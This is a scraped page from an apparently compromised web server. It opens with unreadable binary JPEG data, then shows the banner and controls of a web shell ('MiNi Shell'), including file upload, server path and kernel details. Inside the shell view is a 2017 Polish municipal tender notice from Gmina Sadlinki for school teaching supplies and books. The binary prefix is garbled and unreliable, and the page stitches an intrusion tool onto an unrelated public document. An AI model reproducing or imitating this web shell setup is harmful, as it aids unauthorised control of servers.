JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170316/44800-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 44800 - 2017
              z dnia 2017-03-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Sadlinki: Zakup i dostawa materiałów dydaktycznych <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />LABORATORIUM KOMPETENCJI - Podniesienie jakości edukacji ogólnej wiejskiej Gminy Sadlinki poprzez wsparcie uczniów oraz nauczycieli w rozwijaniu kompetencji kluczowych wymaganych na rynku pracy współfinansowany z Regionalnego Programu Operacyjnego Województwa Pomorskiego 2014-2020, Oś 3, Działanie 3.1 Edukacja ogólna, Poddziałanie 3.2.1 Jakość edukacji ogólnej </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Sadlinki, krajowy numer identyfikacyjny
              17074804000000, ul.
              ul. Kwidzyńska 
              12,
              82522  
              Sadlinki, woj.
              pomorskie, państwo
              Polska, tel.
              552 757 510, e-mail
              zamowienia@sadlinki.pl, faks
              552 757 580.
              <br />
              Adres strony internetowej (URL): www.bip.sadlinki.pl<br />
                Adres profilu nabywcy:

                www.bip.salinki.pl<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej , za pośrednictwem np. poczty, kuriera lub osobiście <br />
                Adres:
                <br />Urząd Gminy , ul. Kwidzyńska 12 82-522 Sadlinki</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup i dostawa materiałów dydaktycznych <br /><b>Numer referencyjny: </b>ZP.271.5.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>OPIS PRZEDMIOTU ZAMÓWIENIA

Zakup i dostawa materiałów dydaktycznych  

Zadanie 2: Kształtowanie i rozwijanie u uczniów kluczowych kompetencji matematyczno-technicznych niezbędnych na rynku pracy w ZS Sadlinki oraz ZS Nebrowo

LP 	Rodzaj materiałów  - zestaw 1	Liczba sztuk
1 	Brystol biały, karton formatu  A-1	50
2	Brystol  format A-1, karton arkusze kolorowe: zielony jasny, zielony ciemny, czerwony, żółty, niebieski, granatowy, razem 100 sztuk	100
3 	Papier A-4, ryza (500kartek) - kolorowy mix	3 ryzy
4 	Papier do  flipchart 20 kartek w 1 bloku:, wymiary bloku; 640x1000mm  
10  bloków czystych kartek  i  10 bloków w  kratkę	20 
5	Nożyczki szkolne z plastikowymi rączkami, długość: min. 15 cm	24
6	Klej w sztyfcie/tubie min 36 gr.	24
7 	Flamastry/markery do papieru, dwustronne lub ścięte, grube kolory; czarny, zielony, niebieski, czerwony, grubość linii pisaka  min 4-5 mm	80
8	Bloczek samoprzylepny 7,5 cm x 7,5 cm ,100 karteczek samoprzylepnych w 1 bloczku. (paczka 12 szt. bloczków) 10 paczek x 12 sztuk bloczków w paczce
 (razem 120 bloczków po 100 karteczek).	10 paczek
9	Zestaw uczniowski przyrządów geometrycznych w zamykanym opakowaniu. 
1 zestaw zawiera: cyrkiel z rysikiem  + zapasowe rysiki ,  linijkę plastikową min. 15 cm, 1  kątomierz - plastikowy , 2 ekierki - plastikowe. 	24 zestawy
10	Blok techniczny  biały -A4, 20 kartek. 	10
11	Blok milimetrowy,  A4, 20 kartek.	10

Dostawa zestaw 1:
	Dostawa dwóch zestawów nr 1 do Zespołu Szkół Sadlinki, ul. Grudziądzka 14a, 82-522 Sadlinki
	Dostawa dwóch zestawów nr 1 do ZS w Nebrowie Wielkim, ul. Szkolna 6, 82-522 Sadlinki

Zadanie 3: Kształtowanie i rozwijanie u uczniów kluczowych kompetencji przyrodniczych niezbędnych na rynku pracy w ZS Sadlinki oraz ZS Nebrowo

3)	Materiały do zajęć przyrodniczych
LP 	Rodzaj materiałów  zestaw 2	Liczba sztuk
1	Brystol biały format A-1	100
2	Brystol  kolorowy, format A-1 arkusze kolorowe: zielony jasny, zielony ciemny, czerwony, żółty, niebieski, granatowy - razem 100 sztuk	100
3	Papier A-4 ryza 500 szt. - kolorowy mix	5 ryz
4	Papier do  flipchart 20 kartek w 1 bloku:, wymiary bloku; 640x1000mm  
10  bloków czystych kartek  i  10 bloków w  kratkę, , razem 20 bloków	20 
5	Nożyczki szkolne z plastikowymi rączkami, długość: min. 15 cm	24
6	Klej w sztyfcie/tubie  min.36 gr.	24
7	Flamastry/markery, dwustronne lub ścięte, grube kolory; czarny, zielony, niebieski, czerwony,  grubość linii pisaka 4-5 mm
	100
8	Bloczek przylepny 7,5 cm x 12,5 cm  (paczka 12 szt.)
Bloczek przylepny 7,5 cm x 12,5 cm, 100 karteczek samoprzylepnych w 1 bloczku,  ( 1 paczka  to 12 szt. bloczków, 5 paczek x 12 sztuk w paczce- razem 60 bloczków po 100 karteczek)	5 paczek
9	Bloczek przylepny 7,5 cm x 7,5 cm  (paczka 12 szt.)
Bloczek samoprzylepny 7,5 cm x 7,5 cm ,100 karteczek samoprzylepnych w 1 bloczku.  (paczka 12 szt.) 10 paczek x 12 sztuk bloczków w paczce
 (razem m 120 bloczków po 100 karteczek).	10 paczek

Dostawa zestaw 2:
	Dostawa dwóch zestawów nr 2 do Zespołu Szkół Sadlinki, ul. Grudziądzka 14a, 82-522 Sadlinki
	Dostawa dwóch zestawów nr 2 do ZS w Nebrowie Wielkim, ul. Szkolna 6, 82-522 Sadlinki

4)	Nagrody i upominki podczas Festiwalu Nauk
LP 	Rodzaj materiałów  - Zestaw 3	Liczba sztuk
1	Pendrive, pamięć przenośna, pojemność min 4GB	40
2	Kalkulatory naukowe
Typ Casio fx-82ES Plus lub równoważny zawierające funkcje: 
	Naturalny zapis
	Naturalny, graficzny wyświetlacz LCD
	Regulacja kontrastu wyświetlacza
	Zasilanie: 1 x AAA (mały "paluszek")
	Wymiary kalkulatora: 8 x 16,2 x 1,4 cm
	Wybrane funkcje
o	Zmienna losowa liczb całkowitych
o	Faktoryzacja
o	Rozkład liczb na czynniki
o	Pamięć obliczeń
o	Funkcje trygonometryczne i hiperboliczne
o	Logarytm dziesiętny, naturalny i o dowolnej podstawie
o	Wartość bezwzględna
o	Tabela funkcji
o	Kombinacje i permutacje
o	Silnia
o	Potęga i pierwiastek dowolnego stopnia
o	Ułamki zwykłe
o	Statystyka i regresja
o	Konwersja współrzędnych biegunowych i prostokątnych
o	Konwersja jednostek kąta (DEG, RAD, GRA)
o	Notacja inżynierska
o	9 komórek pamięci
o	Losowanie liczby	20
3	Długopis, plastikowy z gumka do trzymania i wkładem niebieskim lub czarnym.	20
4	Ołówek szkolny, drewniany, sześciokątny lub okrągły z gumką, długość min. 15 cm, twardość rysika HB	40
5	Giętka linijka, plastikowa, przezroczysta, długość min. 25 cm	20
6	Teczki z rączką, format A4
Wykonana z twardej tektury o grubości min. 2 mm
- kolorowa oklejka, pokryta folią polipropylenową
- wyklejka papierowa
- szerokość grzbietu 40mm
- zamykana na zamek z tworzywa
- wyposażona w rączkę z tworzywa	20
7	Książki popularnonaukowe o tematyce przyrodniczej, technicznej, naukowej, dla młodzieży szkolnej i gimnazjalnej:	107
	Tytuł	Autor	Wydawnictwo	
7.1	Odkrywcy Kontyntentów	Marcin Przewoźniak	Zielona Sowa	1
7.2	Wielcy Wynalazcy	Marcin Przewoźniak	Zielona Sowa	1
7.3	Odkrywcy Grobów Faraonów	Marcin Przewoźniak	Zielona Sowa	1
7.4	Mikołaj Kopernik	Marcin Przewoźniak	Zielona Sowa	1
7.5	Matematyczne śledztwo. Jaskinia tropów	Jacek Drebnowski	Zielona Sowa	1
7.6	Matematyczne śledztwo. Muzeum tajemnic	Jacek Drebnowski	Zielona Sowa	1
7.7	Matematyczne śledztwo. Planeta sekretów	Jacek Drebnowski	Zielona Sowa	1
7.8	Matematyczne śledztwo. Zamek zagadek	Jacek Drebnowski	Zielona Sowa	1
7.9	Logiczne zagadki. Misja - wynalazcy	Patryk Dąbrowski	Zielona Sowa	1
7.10	Logiczne zagadki. Pokonać grę	Patryk Dąbrowski	Zielona Sowa	1
7.11	Logiczne zagadki. Wielkie odliczanie	Patryk Dąbrowski	Zielona Sowa	1
7.12	Logiczne zagadki. Zemsta robotów	Patryk Dąbrowski	Zielona Sowa	1
7.13	Zagadki geograficzne. Niebezpieczna głębia	Patryk Dąbrowski	Zielona Sowa	1
7.14	Zagadki geograficzne. Rwąca rzeka	Patryk Dąbrowski	Zielona Sowa	1
7.15	Zagadki geograficzne. Wyprawa do wnętrza ziemi!	Patryk Dąbrowski	Zielona Sowa	1
7.16	Zagadki geograficzne. Zdradzieckie szczyty	Patryk Dąbrowski	Zielona Sowa	1
7.17	Naukowe śledztwo. Amazońska misja	Patryk Dąbrowski	Zielona Sowa	1
7.18	Naukowe śledztwo. Sekretna formuła	Patryk Dąbrowski	Zielona Sowa	1
7.19	Naukowe śledztwo. Upiorny lunapark	Patryk Dąbrowski	Zielona Sowa	1
7.20	Naukowe śledztwo. Zagubieni w kosmosie	Patryk Dąbrowski	Zielona Sowa	1
7.21	Eksperymenty dla ciekawskich cz. I	Angelika Zacheja	Zielona Sowa	1
7.22	Eksperymenty dla ciekawskich cz. II	Angelika Zacheja	Zielona Sowa	1
7.23	Napisz kod. Programowanie dla najmłodszych cz. I	Max Wainewright	Zielona Sowa	1
7.24	Napisz kod. Programowanie dla najmłodszych cz. II	Max Wainewright	Zielona Sowa	1
7.25	Napisz kod. Programowanie dla najmłodszych cz. III	Max Wainewright	Zielona Sowa	1
7.26	Napisz kod. Programowanie dla najmłodszych cz. IV	Max Wainewright	Zielona Sowa	1
7.27	Encyklopedia pytań i odpowiedzi	Praca zbiorowa	ARTI	1
7.28	Poznajemy świat	Praca zbiorowa	ARTI	1
7.29	Ilustrowany Atlas Świata	Katarzyna Specjalska-Szymczak	ARTI	1
7.30	Ilustrowany Atlas zwierząt	Katarzyna Specjalska-Szymczak	ARTI	1
7.31	Ilustrowana encyklopedia w pytaniach i odpowiedziach	Praca zbiorowa	ARTI	1
7.32	Teraz już wiem. Encyklopedia dla dzieci	Praca zbiorowa	ARTI	1
7.33	Jak, gdzie , kiedy?	Praca zbiorowa	ARTI	2
7.34	Świat nauki	Praca zbiorowa	ARTI	2
7.35	Encyklopedia pytań i odpowiedzi	Praca zbiorowa	ARTI	2
7.36	Encyklopedia odkryć i wynalazków	Praca zbiorowa	ARTI	2
7.37	Księga pytań	Praca zbiorowa	ARTI	2
7.38	Księga wiedzy	Praca zbiorowa	ARTI	2
7.39	Księga wynalazków	Praca zbiorowa	ARTI	2
7.40	Księga noblistów	Praca zbiorowa	ARTI	2
7.41	Odkrywamy ziemię	Praca zbiorowa	ARTI	2
7.42	Przyroda Polski	Praca zbiorowa	ARTI	2
7.43	Żyjąca planeta	Praca zbiorowa	ARTI	2
7.44	Geografia świata	Praca zbiorowa	ARTI	2
7.45	Świat zwierząt	Praca zbiorowa	ARTI	2
7.46	Księga rekordów	Praca zbiorowa	ARTI	2
7.47	Czy wiesz dlaczego?	Praca zbiorowa	ARTI	2
7.48	Odkrywam świat	Praca zbiorowa	ARTI	2
7.49	Encyklopedia faktów	Praca zbiorowa	ARTI	2
7.50	1000 pytań i odpowiedzi. Świat nauki, sport...	Praca zbiorowa	ARTI	1
7.51	1000 pytań i odpowiedzi. Planeta Ziemia, oceany i rzeki...	Praca zbiorowa	ARTI	2
7.52	1000 pytań i odpowiedzi. Maszyny i urządzenia, transport i komunikacja...	Praca zbiorowa	ARTI	1
7.53	1000 pytań i odpowiedzi. Kosmos, człowiek.	Praca zbiorowa	ARTI	1
7.54	Encyklopedia Geografia	Praca zbiorowa	Greg	3
7.55	Encyklopedia Biologia	Praca zbiorowa	Greg	3
7.56	Encyklopedia Matematyka	Praca zbiorowa	Greg	3
7.57	Encyklopedia Fizyka Astronomia	Praca zbiorowa	Greg	3
7.58	Encyklopedia Chemia	Praca zbiorowa	Greg	3
7.59	Wielki słownik angielsko-polski, polsko-angielski +CD 2 tomy	Praca zbiorowa	ARTI	3
7.60	Popularny słownik wyrazów obcych	Praca zbiorowa	ARTI	2
7.61	Popularny słownik frazeologiczny	Praca zbiorowa	ARTI	2
7.62	Popularny słownik poprawnej polszczyzny	Praca zbiorowa	ARTI	2
7.63	Wielki Atlas Świata	Praca zbiorowa	MARTEL	3
7.64	Top 10 Polska	Praca zbiorowa	ARTI	3
7.65	Dookoła Polski	Praca zbiorowa	ARTI	3
7.66	Polska i jej sąsiedzi	Praca zbiorowa	ARTI	3

Dostawa zestaw 3:
	Dostawa dwóch zestawów  nr 3 do Zespołu Szkół Sadlinki, ul. Grudziądzka 14a, 82-522 Sadlinki
	Dostawa dwóch zestawów nr 3 do ZS w Nebrowie Wielkim, ul. Szkolna 6, 82-522 Sadlinki

Zadanie 4: Kształtowanie i rozwijanie u uczniów kompetencji kluczowych w zakresie języków obcych niezbędnych na rynku pracy w ZS w Sadlinki i ZS Nebrowo

LP 	Rodzaj  zestaw 4	Liczba sztuk
1 	Brystol biały format A-1	60
2	Brystol format  A-1 arkusze kolorowe: zielony jasny, zielony ciemny, czerwony, żółty, niebieski, granatowy - razem 100 sztuk	60
3 	Papier A-4 ryza  500 szt kolorowy mix	5 ryz
4 	Papier do  flipchart 20 kartek w 1 bloku:, wymiary bloku; 640x1000mm  
5  bloków czystych kartek  i  5 bloków w kratkę, , razem 10 bloków	10
5	Nożyczki szkolne z plastikowymi rączkami, długość: min. 15 cm	16
6	Klej w sztyfcie/tubie  min. 36 gr.	16
7 	Flamastry/markery do papieru, dwustronne lub ścięte, grube kolory; czarny, zielony, niebieski, czerwony, grubość linii pisaka 4-5 mm	80
8	Bloczek przylepny 7,5 cm x 12,5 cm  (paczka 12 szt.)
Bloczek przylepny 7,5 cm x 12,5 cm, 100 karteczek samoprzylepnych w 1 bloczku,  ( 1 paczka  to 12 szt. bloczków, 5 paczek x 12 sztuk w paczce- razem 60 bloczków po 100 karteczek)	5 paczek

Dostawa zestaw 4:
	Dostawa dwóch zestawów nr 4 do Zespołu Szkół Sadlinki, ul. Grudziądzka 14a, 82-522 Sadlinki
	Dostawa dwóch zestawów nr 4 do ZS w Nebrowie Wielkim, ul. Szkolna 6, 82-522 Sadlinki

Zadanie 7: Kształtowanie postaw i umiejętności uczniów "Rozwój kompetencji miękkich: kreatywności i pracy zespołowej" w ZS Sadlinki i ZS Nebrowo


LP 	Rodzaj  zestaw 5	Liczba sztuk
1 	Brystol biały, format A-1	100
2	Brystol format  A-1 arkusze kolorowe: zielony jasny, zielony ciemny, czerwony, żółty, niebieski, granatowy - razem 100 sztuk	100
3 	Papier A-4 ryza 500 szt.-kolorowy mix	5 ryz
4 	Papier do  flipchart 20 kartek w 1 bloku:, wymiary bloku; 640x1000mm  
10  bloków czystych kartek  i  10 bloków  kratka, razem 20 bloków, 	20 
5	Nożyczki szkolne z plastikowymi rączkami, długość: min. 15 cm	24
6	Klej w sztyfcie/tubie  min. 36 gr.	24
7 	Flamastry/markery, dwustronne lub ścięte, grubość linii pisaka 4-5 mmm. Kolory; czarny, zielony, niebieski, czerwony, 	100
8	Kredki - zestaw szkolny stolikowy, w dużym opakowaniu : drewnianym, plastikowym lub kartonowym. 
Ilość kredek w zestawie minimum 120 w minimum  12 kolorach.
Grubość  10 mm okrągłe lub trójkątne, długie  minimum 175 mm.
Kolory intensywne, rysik miękki.	1 zestaw
9	Bloczek samoprzylepny 7,5 cm x 7,5 cm ,100 karteczek samoprzylepnych w 1 bloczku.  (paczka 12 szt. bloczków) 10 paczek x 12 sztuk bloczków w paczce
 (Razem 120 bloczków po 100 karteczek).	10 paczek

Dostawa zestaw 5:
	Dostawa dwóch zestawów nr 5 do Zespołu Szkół Sadlinki, ul. Grudziądzka 14a, 82-522 Sadlinki
	Dostawa dwóch zestawów nr 5 do ZS w Nebrowie Wielkim, ul. Szkolna 6, 82-522 Sadlinki


<br /><br /><b>II.5) Główny kod CPV: </b>22110000-4<br /><b> Dodatkowe kody CPV:</b>30190000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 14<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                zamawiający nie określa szczegółowego warunku w tym zakresie <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                zamawiający nie określa szczegółowego warunku w tym zakresie <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                zamawiający nie określa szczegółowego warunku w tym zakresie <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
